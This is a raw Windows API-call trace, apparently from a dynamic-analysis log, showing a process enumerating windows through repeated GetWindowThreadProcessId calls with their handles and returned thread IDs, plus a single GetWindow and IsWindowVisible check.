	[0550.323] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x18c8
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x18ac
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x18ec
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1898
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc98
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x153c
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1808
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12a4
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1740
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16c4
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1820
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16ac
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1858
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1664
	[0550.324] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10b4
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10ac
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10ec
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1068
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x17e0
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x102c
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x17a4
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1050
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1694
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1770
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1720
	[0550.325] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x165c
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1578
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16c0
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x161c
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1638
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x15c8
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1554
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1674
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1520
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x14bc
	[0550.326] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf8c
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe9c
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1434
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x14ec
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfcc
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12ac
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1484
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x934
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc0c
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb08
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x948
	[0550.327] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1178
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13e0
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xcd0
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13fc
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdc8
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc18
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc2c
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa1c
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1244
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdb0
	[0550.328] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1398
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1358
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1370
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1340
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x130c
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12c0
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12e4
	[0550.329] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1270
	[0550.330] GetWindow (hWnd=0x1051a, uCmd=0x4) returned 0x0
	[0550.331] IsWindowVisible (hWnd=0x1051a) returned 0
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1298
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x120c
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x122c
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11c4
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11b0
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1188
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1148
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1160
	[0550.331] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10fc
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe34
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xea4
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x514
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe48
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbc8
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdf8
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x318
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xcac
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x8bc
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf9c
	[0550.332] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf48
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe40
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xecc
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xeb8
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe80
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe98
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe60
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xee4
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf00
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdf0
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe1c
	[0550.333] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdd0
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd94
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd74
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd00
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xcd8
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc84
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xca4
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc64
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc24
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb84
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbac
	[0550.334] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x384
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xab8
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x33c
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa44
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa64
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x8a8
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xaf0
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x88c
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb04
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x910
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x230
	[0550.335] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xac0
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xab4
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xaac
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x3d0
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x978
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa7c
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x59c
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa88
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa6c
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa68
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x9f8
	[0550.336] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa04
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x924
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x8dc
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7dc
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x768
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x764
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x820
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x810
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x794
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x83c
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7ac
	[0550.337] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb44
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb5c
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x838
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.338] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x818
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x5b8
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x494
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1ec
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x440
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7e8
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x730
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x2c8
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x31c
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x330
	[0550.339] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x128
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x5c8
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x6f8
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x358
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x73c
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb0
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x250
	[0550.340] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x240
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x790
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x61c
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x540
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x538
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x568
	[0550.341] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x538
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x568
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x538
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x540
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x540
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x57c
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x554
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.342] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x528
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x79c
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4e0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.343] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x44c
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x778
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x558
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1b3c
	[0550.344] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x19bc
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x199c
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1998
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1994
